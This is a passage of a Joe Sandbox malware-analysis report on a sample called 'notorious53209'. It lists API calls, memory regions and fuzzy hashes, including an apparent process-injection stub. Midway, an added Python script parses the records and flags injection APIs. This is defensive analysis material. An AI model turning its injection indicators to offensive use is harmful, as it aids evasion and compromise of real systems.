                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: NamePath$FullLong_memset
                                                  • String ID: X
                                                  • API String ID: 3051022977-3081909835
                                                  • Opcode ID: 9033c5170e9a9fc9d46a98c147dacbe9ef34081a418eee2a687dee5e4fac4b88
                                                  • Instruction ID: 7332dd597541519d5a4bac5a5305f503a1e1f3471eea996248fa7bc909d4d7ce
                                                  • Opcode Fuzzy Hash: 9033c5170e9a9fc9d46a98c147dacbe9ef34081a418eee2a687dee5e4fac4b88
                                                  • Instruction Fuzzy Hash: 3F21C671A142589BDF11EF98CC45BEE7BF8EF49314F104019E408E7241DBF899498F92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: 261686cfba9a3e557e2b8d3bdf651bf030d41a945e79675cd9f858342ece74c7
                                                  • Instruction ID: a1ee452bda6484017fecd21331b906939b957f0f260f05a6614178e7fe323410
                                                  • Opcode Fuzzy Hash: 261686cfba9a3e557e2b8d3bdf651bf030d41a945e79675cd9f858342ece74c7
                                                  • Instruction Fuzzy Hash: CF01F9719046586EDB28C7A8C81AEEE7BF8EB01301F00419AF592D2581E5B9A6048B60
                                                  APIs
                                                    • Part of subcall function 008A594C: __FF_MSGBANNER.LIBCMT ref: 008A5963
                                                    • Part of subcall function 008A594C: __NMSG_WRITE.LIBCMT ref: 008A596A
                                                    • Part of subcall function 008A594C: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 008A598F
                                                  • std::exception::exception.LIBCMT ref: 008A102C
                                                  • __CxxThrowException@8.LIBCMT ref: 008A1041
                                                    • Part of subcall function 008A87DB: RaiseException.KERNEL32(?,?,00000000,0093BAF8,?,00000001,?,?,?,008A1046,00000000,0093BAF8,00889FEC,00000001), ref: 008A8830
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID: bad allocation
                                                  • API String ID: 3902256705-2104205924
                                                  • Opcode ID: 6507c1662dd4a63f8e25663dba656a9ad93f005db6c01afa8ff30e8228336dfc
                                                  • Instruction ID: 21330179613f07a357f1d6e33b67e04ba139c197e6cf9ee5af678c0aa93c02ec
                                                  • Opcode Fuzzy Hash: 6507c1662dd4a63f8e25663dba656a9ad93f005db6c01afa8ff30e8228336dfc
                                                  • Instruction Fuzzy Hash: 94F0813550471DA6EF21BB5CEC0A9DF7BA8FF02350F100425F904E6991EFB18AD086A2
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 008E9B82
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008E9B99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 753ee89bc0254468b335f32d536b7e3f42b77d27bd1e5dcc41e0580b1364ea25
                                                  • Instruction ID: e3751dc1905be67bbff95b6277e5753323dd367327e9e0fe7c6b64e410affb62
                                                  • Opcode Fuzzy Hash: 753ee89bc0254468b335f32d536b7e3f42b77d27bd1e5dcc41e0580b1364ea25
                                                  • Instruction Fuzzy Hash: CDD05E7954430DAFDB209B94EC0EF9A772CEB04704F0042A1BEA4D10A1DEB066989B91
                                                  APIs
                                                  • CreateProcessW.KERNEL32(?,00000000), ref: 00101ACD
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00101B13
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.358795810.0000000000100000.00000040.00001000.00020000.00000000.sdmp, Offset: 00100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_100000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateMemoryRead
                                                  • String ID:
                                                  • API String ID: 2726527582-0
                                                  • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                  • Instruction ID: a32c08d005ba76f442df344cf081799ba6414caf3e38dd2186d9f3a5a78f5156
                                                  • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                  • Instruction Fuzzy Hash: 10620B30A14258DBEB24CFA4C854BDEB376EF58300F1091A9D14DEB2D4E7B99E81CB59
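The record immediately above pairs CreateProcessW with ReadProcessMemory inside a region the report marks as not backed by a PE image (offset 00100000), which is the shape an injection or hollowing stub takes, and it is exactly the kind of function an analyst wants pulled out of a dump this long automatically. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the repeating APIs / Memory Dump Source / Similarity records into structured objects and ranks them with a simple heuristic. The embedded sample input is constructed from records on this page and trimmed to the fields the parser reads; the injection API list, the severity ladder and the "aut" temp-file-prefix rule are this example's own choices, not anything the report defines.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed excerpt modelled on this report's records, trimmed to the
# fields the parser consumes; it is not an actual Joe Sandbox export.
SAMPLE_REPORT = """\
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 008E9B82
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008E9B99
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
APIs
• CreateProcessW.KERNEL32(?,00000000), ref: 00101ACD
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00101B13
Memory Dump Source
• Source File: 00000005.00000002.358795810.0000000000100000.00000040.00001000.00020000.00000000.sdmp, Offset: 00100000, based on PE: false
Similarity
• API ID: Process$CreateMemoryRead
APIs
• _free.LIBCMT ref: 008E8FA5
  • Part of subcall function 008A2F95: HeapFree.KERNEL32(00000000,00000000), ref: 008A2FA9
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: _free$ErrorFreeHeapLast
"""

API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
SOURCE_RE = re.compile(r"^•\s+Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-F]+), "
                       r"based on PE: (?P<pe>true|false)$")
KV_RE = re.compile(r"^•\s+(?P<key>API ID|String ID): ?(?P<value>.*)$")

# Heuristic of this example: APIs that together implement process injection
# or hollowing (create a target, then read/write/map its memory, run it).
INJECTION_APIS = {"CreateProcessW", "CreateProcessA", "WriteProcessMemory",
                  "ReadProcessMemory", "VirtualAllocEx", "NtUnmapViewOfSection",
                  "NtMapViewOfSection", "SetThreadContext", "ResumeThread",
                  "CreateRemoteThread"}
SEVERITY = ["info", "low", "medium", "high"]

@dataclass
class FunctionRecord:
    apis: List[Tuple[str, str, str, bool]] = field(default_factory=list)  # name, module, args, is_subcall
    offset: str = ""
    pe_backed: Optional[bool] = None   # None until the Memory Dump Source line is seen
    api_id: str = ""
    string_id: str = ""

def parse_records(text: str) -> List[FunctionRecord]:
    """One record per function; it closes once its Memory Dump Source line is read."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings", "Memory Dump Source") and cur.pe_backed is not None:
            records.append(cur)
            cur = FunctionRecord()
        if (m := API_RE.match(line)):
            cur.apis.append((m["name"], m["module"], m["args"] or "", m["sub"] is not None))
        elif (m := SOURCE_RE.match(line)):
            cur.offset, cur.pe_backed = m["offset"], m["pe"] == "true"
        elif (m := KV_RE.match(line)):
            setattr(cur, m["key"].lower().replace(" ", "_"), m["value"])  # api_id / string_id
    if cur.pe_backed is not None:
        records.append(cur)
    return records

def triage(rec: FunctionRecord) -> Tuple[str, List[str]]:
    """Rank one record; the severity ladder is this example's own heuristic."""
    hits = sorted({name for name, _, _, _ in rec.apis} & INJECTION_APIS)
    reasons = []
    if hits:
        reasons.append("process-manipulation APIs: " + ", ".join(hits))
    if rec.pe_backed is False:
        reasons.append(f"code at {rec.offset} is not backed by a PE image (shellcode or unpacked code)")
    for name, _, args, _ in rec.apis:
        # A GetTempFileName prefix of 'aut' is characteristic of the AutoIt runtime.
        if name.startswith("GetTempFileName") and "aut" in args.split(","):
            reasons.append("temp file prefix 'aut' (AutoIt runtime staging files)")
    if hits and rec.pe_backed is False:
        return "high", reasons
    if len(hits) >= 2 or rec.pe_backed is False:
        return "medium", reasons
    return ("low" if reasons else "info"), reasons

def flag_report(text: str, minimum: str = "low"):
    """(severity, offset, api_id, reasons) for every record at or above `minimum`."""
    out = []
    for rec in parse_records(text):
        sev, reasons = triage(rec)
        if SEVERITY.index(sev) >= SEVERITY.index(minimum):
            out.append((sev, rec.offset, rec.api_id, reasons))
    return out
```

Feed `flag_report` the full report text copied from the page rather than the embedded sample to rank every function. "Part of subcall function" lines are kept but marked with `is_subcall=True`, so a caller can decide whether APIs reached only through callees should raise a function's score; the parser deliberately ignores the Opcode and Instruction fuzzy hashes, which are for similarity lookup rather than behaviour.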
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa0505f1b62f07058b4dd96e2e1f596a5b3ebb38d4f4e4d60cdef9cd4bcc6c45
                                                  • Instruction ID: bb21f0aa7ddbc1197de4dc11c637bd55d839b15b095523b5b4250e3e34a4ab46
                                                  • Opcode Fuzzy Hash: fa0505f1b62f07058b4dd96e2e1f596a5b3ebb38d4f4e4d60cdef9cd4bcc6c45
                                                  • Instruction Fuzzy Hash: CCF13871A083059FC714DF28C480A6ABBE5FF88314F14892EFA99DB251DB71E945CF82
                                                  APIs
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A03D3
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008A03DB
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A03E6
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A03F1
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008A03F9
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 008A0401
                                                    • Part of subcall function 00896259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 008962B4
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0088FB2D
                                                  • OleInitialize.OLE32(00000000), ref: 0088FBAA
                                                  • CloseHandle.KERNEL32(00000000), ref: 008C49F2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                                  • String ID:
                                                  • API String ID: 3094916012-0
                                                  • Opcode ID: eb1eea74d4269f4418998727dfc56b943efae15b182640d2f9215273c74bff51
                                                  • Instruction ID: 9cbb98b498c106104708a9f75b010f66397e437097c5564373b9da2d795d79fc
                                                  • Opcode Fuzzy Hash: eb1eea74d4269f4418998727dfc56b943efae15b182640d2f9215273c74bff51
                                                  • Instruction Fuzzy Hash: FD81ABF89293908ECBA4EF39E954E557AF4FB9B718310812AE119C7272EB314444EF13
                                                  APIs
                                                  • _memset.LIBCMT ref: 00884401
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008844A6
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008844C3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: 660e21c32245a27eb4845a710434521332303af0c590076c6dd0c5fbbb8e6a96
                                                  • Instruction ID: 283a3d575c208f21db394ad4a90cbe7d94ccf662c5f40be6284fd92fe996058a
                                                  • Opcode Fuzzy Hash: 660e21c32245a27eb4845a710434521332303af0c590076c6dd0c5fbbb8e6a96
                                                  • Instruction Fuzzy Hash: 793175B55097019FD720EF24D884B97BBF4FB4A304F00092EF59AC3251D7B56948DB96
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 008A5963
                                                    • Part of subcall function 008AA3AB: __NMSG_WRITE.LIBCMT ref: 008AA3D2
                                                    • Part of subcall function 008AA3AB: __NMSG_WRITE.LIBCMT ref: 008AA3DC
                                                  • __NMSG_WRITE.LIBCMT ref: 008A596A
                                                    • Part of subcall function 008AA408: GetModuleFileNameW.KERNEL32(00000000,009443BA,00000104,00000000,00000001,00000000), ref: 008AA49A
                                                    • Part of subcall function 008AA408: ___crtMessageBoxW.LIBCMT ref: 008AA548
                                                    • Part of subcall function 008A32DF: ___crtCorExitProcess.LIBCMT ref: 008A32E5
                                                    • Part of subcall function 008A32DF: ExitProcess.KERNEL32 ref: 008A32EE
                                                    • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                                                  • RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 008A598F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: 368921db3f88e573e7b07e767b5c79994456a295e5b8dbe5166a021e6ffff279
                                                  • Instruction ID: 61ef6513c132713cc898732e195cd6fbf40287ce7ea21af0c6894661ea8a241b
                                                  • Opcode Fuzzy Hash: 368921db3f88e573e7b07e767b5c79994456a295e5b8dbe5166a021e6ffff279
                                                  • Instruction Fuzzy Hash: BC01C035214A15DEF6212B28BC52B6B7658FF43774F18002AF500EFD81DBB09D819262
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 008E9B45
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008E9B5B
                                                  • CloseHandle.KERNEL32(00000000), ref: 008E9B62
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                                                  • Instruction ID: 828905c44dcf2327938cb69488b922b8a1c28126878aa6bc9343b48466b1f173
                                                  • Opcode Fuzzy Hash: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                                                  • Instruction Fuzzy Hash: 90E08632184324BBD7311B54EC09FCA7B18EB05B71F104120FB64A94E087B12611A798
                                                  APIs
                                                  • _free.LIBCMT ref: 008E8FA5
                                                    • Part of subcall function 008A2F95: HeapFree.KERNEL32(00000000,00000000), ref: 008A2FA9
                                                    • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                                                  • _free.LIBCMT ref: 008E8FB6
                                                  • _free.LIBCMT ref: 008E8FC8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                                  • Instruction ID: efe858bc38702fb1aead1598cd7435e54a283fbf26bceabc572b1837d2be3faa
                                                  • Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                                  • Instruction Fuzzy Hash: F4E012A1709B419EDA34A57DAD40A9757EEFF4A350718081DB40DDB542DE24E8418128
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
                                                  • Opcode ID: 320b1ddfaa41f7a92aa55f629b0a4b3db4f56618a7e5b188654d1b46c902b2bc
                                                  • Instruction ID: 37b5df10234fa476e0c00be32904595ea23a2fa63b64c771b32bb4243572a173
                                                  • Opcode Fuzzy Hash: 320b1ddfaa41f7a92aa55f629b0a4b3db4f56618a7e5b188654d1b46c902b2bc
                                                  • Instruction Fuzzy Hash: 4B221674508245DFDB28EF18C494B2AB7E1FF85344F15895EE896CB3A2D731E941CB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: EA06
                                                  • API String ID: 4104443479-3962188686
                                                  • Opcode ID: 0528dcf65f54be279ce23b15fcfc377cf3ceadf9af8b0b5de1f1627c4f5ac264
                                                  • Instruction ID: 3d000b11c29dbb6fd68ca366a65b71b0c64b2c3b9f6cfdfa9fd06dda32c2dc8b
                                                  • Opcode Fuzzy Hash: 0528dcf65f54be279ce23b15fcfc377cf3ceadf9af8b0b5de1f1627c4f5ac264
                                                  • Instruction Fuzzy Hash: 34416E23A046596BDF21BB68C8517BE7FA5FB01314F586065FC82DB282D6219D4483A2
                                                  APIs
                                                  • 73666F36.UXTHEME ref: 00884992
                                                    • Part of subcall function 008A35AC: __lock.LIBCMT ref: 008A35B2
                                                    • Part of subcall function 008A35AC: RtlDecodePointer.NTDLL(00000001), ref: 008A35BE
                                                    • Part of subcall function 008A35AC: RtlEncodePointer.NTDLL(?), ref: 008A35C9
                                                    • Part of subcall function 00884A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00884A73
                                                    • Part of subcall function 00884A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00884A88
                                                    • Part of subcall function 00883B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B7A
